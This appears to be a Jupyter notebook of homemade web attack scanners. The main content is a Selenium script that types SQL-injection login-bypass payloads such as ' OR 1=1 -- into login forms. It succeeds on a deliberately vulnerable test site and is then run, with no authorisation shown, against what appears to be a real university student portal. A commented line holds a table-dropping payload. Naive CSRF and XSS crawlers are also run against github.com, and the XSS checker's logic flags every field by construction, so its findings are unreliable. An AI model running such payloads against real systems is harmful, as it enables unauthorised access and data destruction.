In [ ]:
https://demo.testfire.net/https://demo.testfire.net/

In [8]:
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
import time
from selenium.common.exceptions import StaleElementReferenceException, NoSuchElementException

def selenium_test(url):
    # Initialize the Selenium WebDriver (Chrome in this case)
    print("Initializing WebDriver...")
    driver = webdriver.Chrome()

    try:
        # Open the URL in the browser
        print(f"Opening URL: {url}")
        driver.get(url)
        time.sleep(2)  # Let the page load for 2 seconds

        # SQL Injection Payloads
        payloads = [
            "' OR 1=1 --",
            # "' OR 'a'='a",
            # '" OR 1=1 --',
            # '" OR "a"="a"',
            # "' OR 1=1#",
            # "'; DROP TABLE users --"
        ]
        
        # Try finding the username and password fields explicitly by name
        username_field = None
        password_field = None

        # Find input fields by their names
        try:
            username_field = driver.find_element(By.NAME, "uname")
            password_field = driver.find_element(By.NAME, "pass")
            print("Successfully identified username and password fields.")
        except NoSuchElementException:
            print("Username or password field not found using name attributes.")
            driver.quit()
            return  # Stop if the fields are not found

        # Loop through the payloads and inject them into the fields
        for payload in payloads:
            print(f"\nTesting payload: {payload}")

            try:
                # Clear fields and send the payload
                print("Clearing input fields...")
                username_field.clear()
                password_field.clear()

                # Injecting payload into fields
                print("Injecting payload into the fields...")
                username_field.send_keys(payload)
                password_field.send_keys(payload)

                # Submitting the form
                password_field.send_keys(Keys.RETURN)
                print("Submitting the form...")
                time.sleep(2)  # Allow the login to attempt

                # Check if login succeeded and we got redirected (successful login redirection)
                current_url = driver.current_url
                if current_url != url:
                    print(f"Redirect detected! New URL: {current_url}")
                    # Wait for the logged-in page to load for 5 seconds
                    time.sleep(5)

                    # Go back to the login page
                    print("Going back to the login page...")
                    driver.back()
                    time.sleep(2)  # Wait for the login page to load again
                else:
                    print("No redirection detected, retrying with next payload...")

            except StaleElementReferenceException:
                print("Stale element reference exception detected.")
                print("Re-locating the username and password fields...")
                username_field = None
                password_field = None
                try:
                    username_field = driver.find_element(By.NAME, "uname")
                    password_field = driver.find_element(By.NAME, "pass")
                    print("Successfully re-located the fields after StaleElementReferenceException.")
                except NoSuchElementException:
                    print("Failed to re-locate the fields after StaleElementReferenceException.")
                    continue

    finally:
        print("Closing the WebDriver...")
        driver.quit()

# Replace with your test URL
url = "http://testphp.vulnweb.com/login.php"
selenium_test(url)


Initializing WebDriver...
Opening URL: http://testphp.vulnweb.com/login.php
Successfully identified username and password fields.

Testing payload: ' OR 1=1 --
Clearing input fields...
Injecting payload into the fields...
Submitting the form...
Redirect detected! New URL: http://testphp.vulnweb.com/userinfo.php
Going back to the login page...
Closing the WebDriver...


In [9]:
#flex
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import StaleElementReferenceException, NoSuchElementException
import time
import urllib.parse
import requests

# Basic SQLi payloads
payloads = [
    "' OR 1=1 --",
    "' OR 'a'='a",
    "' OR 1=1#"
    # "'; DROP TABLE users --",
    # '" OR 1=1 --',
    # 'admin" --',
    # "' OR '1'='1", https://flexstudent.nu.edu.pk/Login
    # "' OR '' = '"
]

# Part 1: Scan SQLi in URL parameters
def scan_url_parameters(url):
    print("\n[+] Scanning URL parameters...")
    parsed_url = urllib.parse.urlparse(url)
    query_params = urllib.parse.parse_qs(parsed_url.query)

    if not query_params:
        print("[-] No query parameters found.")
        return

    for param in query_params:
        for payload in payloads:
            test_params = query_params.copy()
            test_params[param] = payload
            encoded_query = urllib.parse.urlencode(test_params, doseq=True)
            test_url = urllib.parse.urlunparse(parsed_url._replace(query=encoded_query))
            print(f"[*] Testing: {test_url}")
            try:
                resp = requests.get(test_url, timeout=5)
                if any(err in resp.text.lower() for err in ["sql", "syntax", "warning", "error", "exception"]):
                    print(f"[!] ✅ Potential SQL Injection in '{param}' with payload: {payload}")
            except Exception as e:
                print(f"[x] Request failed: {e}")

# Part 2: Selenium-based form SQLi testing
def selenium_form_scan(url, username_fields=None, password_fields=None):
    print("\n[+] Starting Selenium SQLi Form Scan...")
    driver = webdriver.Chrome()
    driver.get(url)
    time.sleep(2)
    initial_url = driver.current_url

    # Locate all input fields
    input_elements = driver.find_elements(By.TAG_NAME, "input")
    print(f"[+] Found {len(input_elements)} input fields.")

    # Guess field roles or use user-provided names
    username_candidates = [el for el in input_elements if el.get_attribute("name") in (username_fields or ["username", "user", "uname", "email", "login"])]
    password_candidates = [el for el in input_elements if el.get_attribute("name") in (password_fields or ["password", "pass", "pwd"])]

    if not username_candidates:
        username_candidates = [el for el in input_elements if el.get_attribute("type") == "text"]
    if not password_candidates:
        password_candidates = [el for el in input_elements if el.get_attribute("type") == "password"]

    if not username_candidates or not password_candidates:
        print("[-] Could not identify input fields for login.")
        driver.quit()
        return

    print(f"[+] Using {len(username_candidates)} username and {len(password_candidates)} password field(s) for injection.")

    for user_field in username_candidates:
        for pass_field in password_candidates:
            for payload in payloads:
                try:
                    print(f"[*] Injecting payload: {payload}")
                    user_field.clear()
                    pass_field.clear()
                    user_field.send_keys(payload)
                    pass_field.send_keys(payload)
                    pass_field.send_keys(Keys.RETURN)
                    time.sleep(3)

                    if driver.current_url != initial_url:
                        print(f"[!] ✅ Possible SQLi: Redirected to {driver.current_url} with payload '{payload}'")
                        driver.get(url)
                        time.sleep(2)
                    else:
                        print("[-] No redirect after payload.")
                except StaleElementReferenceException:
                    print("[x] StaleElementReferenceException occurred. Refinding fields...")
                    try:
                        input_elements = driver.find_elements(By.TAG_NAME, "input")
                        user_field = next(el for el in input_elements if el.get_attribute("type") == "text")
                        pass_field = next(el for el in input_elements if el.get_attribute("type") == "password")
                    except Exception:
                        print("[x] Could not re-identify fields.")
                        continue
                except Exception as e:
                    print(f"[x] Error: {e}")
    driver.quit()

# Entry Point
if __name__ == "__main__":
    target_url = input("Enter the URL to test: ").strip()
    custom_user_field = input("Enter custom username field name (optional): ").strip()
    custom_pass_field = input("Enter custom password field name (optional): ").strip()

    user_fields = [custom_user_field] if custom_user_field else None
    pass_fields = [custom_pass_field] if custom_pass_field else None

    if target_url:
        scan_url_parameters(target_url)
        selenium_form_scan(target_url, user_fields, pass_fields)
    else:
        print("[-] No URL provided.")



Enter the URL to test:   https://flexstudent.nu.edu.pk/Login
Enter custom username field name (optional):  username
Enter custom password field name (optional):  password



[+] Scanning URL parameters...
[-] No query parameters found.

[+] Starting Selenium SQLi Form Scan...
[+] Found 4 input fields.
[+] Using 1 username and 1 password field(s) for injection.
[*] Injecting payload: ' OR 1=1 --
[-] No redirect after payload.
[*] Injecting payload: ' OR 'a'='a
[-] No redirect after payload.
[*] Injecting payload: ' OR 1=1#
[-] No redirect after payload.


In [6]:
#secheader
#securityheaders
import requests

# List of important security headers to check
SECURITY_HEADERS = [
    "Content-Security-Policy",
    "Strict-Transport-Security",
    "X-Frame-Options",
    "X-Content-Type-Options",
    "Referrer-Policy",
    "Permissions-Policy",
    "Cross-Origin-Embedder-Policy",
    "Cross-Origin-Opener-Policy",
    "Cross-Origin-Resource-Policy",
    "Expect-CT",
    "Feature-Policy",  # Deprecated but some sites still use it
]

def check_security_headers(url):
    try:
        # Send a HEAD request (faster, but fallback to GET if not allowed)
        try:
            response = requests.head(url, allow_redirects=True, timeout=10)
        except requests.exceptions.RequestException:
            response = requests.get(url, allow_redirects=True, timeout=10)
        
        headers = response.headers
        print(f"\n[+] Checking security headers for {url}\n")

        results = {}
        for header in SECURITY_HEADERS:
            if header in headers:
                results[header] = f"✅ Present ({headers[header]})"
            else:
                results[header] = "❌ Missing"

        for header, status in results.items():
            print(f"{header}: {status}")

        return results

    except requests.exceptions.RequestException as e:
        print(f"[-] Error accessing {url}: {e}")
        return None

if __name__ == "__main__":
    target_url = input("Enter the URL (with http/https): ").strip()
    if not target_url.startswith(("http://", "https://")):
        print("[-] Please include http:// or https:// in the URL.")
    else:
        check_security_headers(target_url)


Enter the URL (with http/https):  https://github.com/



[+] Checking security headers for https://github.com/

Content-Security-Policy: ✅ Present (default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresults

In [ ]:
#CSRF
import requests
import re
from urllib.parse import urlparse, urljoin
import colorama
from colorama import Fore, Style

colorama.init()

visited_urls = set()

def extract_internal_links(url):
    internal_links = set()
    try:
        response = requests.get(url, timeout=5)
        if response.status_code == 200:
            page_content = response.text
            base_url = get_base_url(url)
            links = re.findall(r'href=[\'"](.*?)[\'"]', page_content, flags=re.IGNORECASE)
            for link in links:
                absolute_link = urljoin(base_url, link.strip())
                if is_same_domain(absolute_link, base_url):
                    internal_links.add(absolute_link)
    except requests.exceptions.RequestException:
        pass
    return internal_links

def get_base_url(url):
    parsed_url = urlparse(url)
    base_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
    return base_url

def is_same_domain(url, base_url):
    parsed_url = urlparse(url)
    parsed_base_url = urlparse(base_url)
    return parsed_url.netloc == parsed_base_url.netloc

def check_csrf_vulnerability(url):
    try:
        response = requests.get(url, timeout=5)
        if response.status_code == 200:
            page_content = response.text
            forms = re.findall(r'<form.*?>.*?</form>', page_content, flags=re.IGNORECASE | re.DOTALL)
            for form in forms:
                # Check for hidden inputs that may indicate a CSRF token
                hidden_inputs = re.findall(r'<input[^>]*type=["\']hidden["\'][^>]*>', form, flags=re.IGNORECASE)
                csrf_found = False
                for hidden_input in hidden_inputs:
                    if re.search(r'name=["\'].*csrf.*["\']', hidden_input, flags=re.IGNORECASE):
                        csrf_found = True
                        break
                if not csrf_found:
                    print(f'{Fore.RED}[Vulnerable]{Style.RESET_ALL} Possible CSRF vulnerability in a form at {url}')
                else:
                    print(f'{Fore.GREEN}[Secure]{Style.RESET_ALL} CSRF token found in form at {url}')
    except requests.exceptions.RequestException:
        print(f'{Fore.YELLOW}[Warning]{Style.RESET_ALL} Could not connect to {url}')

def crawl_and_check_csrf(url):
    if url not in visited_urls:
        visited_urls.add(url)
        print(f'\nScanning: {url}')
        check_csrf_vulnerability(url)
        internal_links = extract_internal_links(url)
        for link in internal_links:
            crawl_and_check_csrf(link)

if __name__ == '__main__':
    url = input("Enter a URL to scan for CSRF vulnerabilities: ").strip()
    crawl_and_check_csrf(url)


Enter a URL to scan for CSRF vulnerabilities:  https://github.com/



Scanning: https://github.com/
[Vulnerable] Possible CSRF vulnerability in a form at https://github.com/
[Vulnerable] Possible CSRF vulnerability in a form at https://github.com/
[Vulnerable] Possible CSRF vulnerability in a form at https://github.com/
[Vulnerable] Possible CSRF vulnerability in a form at https://github.com/
[Vulnerable] Possible CSRF vulnerability in a form at https://github.com/

Scanning: https://github.com/newsroom
[Vulnerable] Possible CSRF vulnerability in a form at https://github.com/newsroom
[Vulnerable] Possible CSRF vulnerability in a form at https://github.com/newsroom
[Vulnerable] Possible CSRF vulnerability in a form at https://github.com/newsroom

Scanning: https://github.com/sitemap
[Vulnerable] Possible CSRF vulnerability in a form at https://github.com/sitemap
[Vulnerable] Possible CSRF vulnerability in a form at https://github.com/sitemap
[Vulnerable] Possible CSRF vulnerability in a form at https://github.com/sitemap

Scanning: https://github.com/res

In [7]:
#XSS
import requests
import re
from urllib.parse import urlparse, urljoin
import colorama
from colorama import Fore, Style

colorama.init()

visited_urls = set()

def extract_internal_links(url):
    internal_links = set()
    response = requests.get(url)
    if response.status_code == 200:
        page_content = response.text
        base_url = get_base_url(url)
        links = re.findall(r'href=[\'"](.*?)[\'"]', page_content, flags=re.IGNORECASE)
        for link in links:
            absolute_link = urljoin(base_url, link.strip())
            if is_same_domain(absolute_link, base_url):
                internal_links.add(absolute_link)
    return internal_links

def get_base_url(url):
    parsed_url = urlparse(url)
    base_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
    return base_url

def is_same_domain(url, base_url):
    parsed_url = urlparse(url)
    parsed_base_url = urlparse(base_url)
    return parsed_url.netloc == parsed_base_url.netloc

def perform_xss_checks_input(url, input_fields):
    payloads = ['<script>alert("XSS")</script>', '<img src="x" onerror="alert(\'XSS\')">']
    for input_field in input_fields:
        vulnerable = False
        for payload in payloads:
            modified_input_field = re.sub(r'value\s*?=\s*?".*?"', f'value="{payload}"', input_field, flags=re.IGNORECASE)
            modified_input_field = re.sub(r'value\s*?=\s*?\'.*?\'', f"value='{payload}'", modified_input_field, flags=re.IGNORECASE)
            modified_input_field = re.sub(r'value\s*?=\s*?{.*?}', f'value={payload}', modified_input_field, flags=re.IGNORECASE)
            if payload in modified_input_field:
                vulnerable = True
                break
        if vulnerable:
            print(f'{Fore.RED}Vulnerable{Style.RESET_ALL}: {input_field} in {url}')
        else:
            print(f'Secure: {input_field} in {url}')

def perform_xss_checks_textarea(url, textarea_fields):
    payloads = ['<script>alert("XSS")</script>', '<img src="x" onerror="alert(\'XSS\')">']
    for textarea_field in textarea_fields:
        vulnerable = False
        for payload in payloads:
            modified_textarea_field = re.sub(r'>(.*?)</textarea>', f'>{payload}</textarea>', textarea_field, flags=re.IGNORECASE)
            if payload in modified_textarea_field:
                vulnerable = True
                break
        if vulnerable:
            print(f'{Fore.RED}Vulnerable{Style.RESET_ALL}: {textarea_field} in {url}')
        else:
            print(f'Secure: {textarea_field} in {url}')

    internal_links = extract_internal_links(url)

    for link in internal_links:
        if link not in visited_urls:
            visited_urls.add(link)
            perform_xss_checks(link)

def perform_xss_checks(url):
    response = requests.get(url)
    if response.status_code == 200:
        page_content = response.text
        input_fields = re.findall(r'<input.*?type=["\']text["\'].*?>', page_content, flags=re.IGNORECASE)
        textarea_fields = re.findall(r'<textarea.*?>.*?</textarea>', page_content, flags=re.IGNORECASE)
        perform_xss_checks_input(url, input_fields)
        perform_xss_checks_textarea(url, textarea_fields)

url = input("Enter a URL: ")

perform_xss_checks(url)

Enter a URL:  https://github.com/


Vulnerable: <textarea name="feedback" class="form-control width-full mb-2" style="height: 120px" id="feedback"></textarea> in https://github.com/
Vulnerable: <textarea name="feedback" class="form-control width-full mb-2" style="height: 120px" id="feedback"></textarea> in https://github.com/github
Vulnerable: <textarea name="feedback" class="form-control width-full mb-2" style="height: 120px" id="feedback"></textarea> in https://github.com/solutions/use-case/ci-cd
Vulnerable: <textarea name="feedback" class="form-control width-full mb-2" style="height: 120px" id="feedback"></textarea> in https://github.com/premium-support
Vulnerable: <textarea name="feedback" class="form-control width-full mb-2" style="height: 120px" id="feedback"></textarea> in https://github.com/features/copilot
Vulnerable: <textarea name="feedback" class="form-control width-full mb-2" style="height: 120px" id="feedback"></textarea> in https://github.com/pricing
Vulnerable: <textarea name="feedback" class="form-contro

ConnectionError: ('Connection aborted.', RemoteDisconnected('Remote end closed connection without response'))

In [ ]:
#Links
  https://flexstudent.nu.edu.pk/Login
 http://testphp.vulnweb.com/login.php
 https://github.com/
https://demo.testfire.net/